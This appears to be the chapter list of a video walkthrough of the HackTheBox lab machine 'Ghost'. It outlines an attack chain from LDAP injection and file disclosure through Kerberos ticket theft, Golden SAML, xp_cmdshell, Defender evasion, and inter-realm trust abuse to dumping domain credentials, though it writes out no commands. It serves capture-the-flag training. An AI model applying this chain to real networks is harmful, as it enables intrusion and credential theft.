HackTheBox - Ghost

00:00 - Intro
01:00 - Start of nmap
05:20 - Taking a look at all the websites
06:45 - Showing why you should be careful when enumerating VHOSTS, also using gobuster in DNS mode since there are multiple web services and a DNS Server
12:45 - Discovering LDAP Injection in intranet page
15:40 - Showing how our LDAP Injection is boolean injection which lets us enumerate data in LDAP
21:30 - Creating a python program to perform the boolean injection
33:15 - Got the password for gitea_temp_principal
35:00 - Looking at the Intranet Backend code that was in Gitea which is written in Rust using the Rocket Web Library, finding a RCE but it protected by auth
41:00 - Looking at the Blog project in Gitea, that shows there is a modification to the Ghost CMS Application which has a File Disclosure vulnerability
45:30 - Exploiting the File Disclosure in the blog, downloading the SQL Lite Database, Grabbing the API Key from the environment and then getting a shell through the Rust API
50:00 - Shell returned on intranet container, discovering a SSH Control Master socket, which lets us ssh into the dev workstation without a password
56:00 - On the workstation, Florence.Ramirez has a KRB Ticket, downloading it and then testing it
58:30 - Running bloodhound, which is giving us trouble because of some weird connection issues as Impacket isn't trying all the IP's given for a DC.
01:09:20 - Editing our bloodhound to hardcode the IP Address, which is a really hacky thing to do, but it worked. Then looking at Bloodhound and not seeing much
01:17:20 - Using dnstool to create a DNS Record on the domain controller, then responder to steal the hash of a user trying to connect to that item
01:21:00 - Got Justin.Bradley's password, who can grab dump the GMSA Password, getting the ADFS Service accounts password
01:27:15 - Dumping the ADFS Data (ADFSDump), then using ADFSpoof to perform the Golden SAML Attack to impersonate Administrator on a federated web login
01:42:00 - Logged into core as administrator, which is a MSSQL Shell. Enumerating the database, discovering linked databases, enumerating permissions, discovering we can impersonate SA, enable and run xp_cmdshell for rce
02:01:10 - Editing our powershell script to bypass defender by renaming a bunch of variables. Using EFSPotato to escalate from the service account to system
02:13:00 - System on the Corp DC, which has a bi-directional trust
02:17:36 - Using mimikatz to dump the Ghost$ account which the parent subdomain trusts, then using ticketer to create a TGT that abuses this inter-realm trust to say we can access the parent domain
02:20:50 - Using getST to create a service ticket that requests a TGS that says we have access to DC01's CIFS Service, then running Secretsdump to dump all the credentials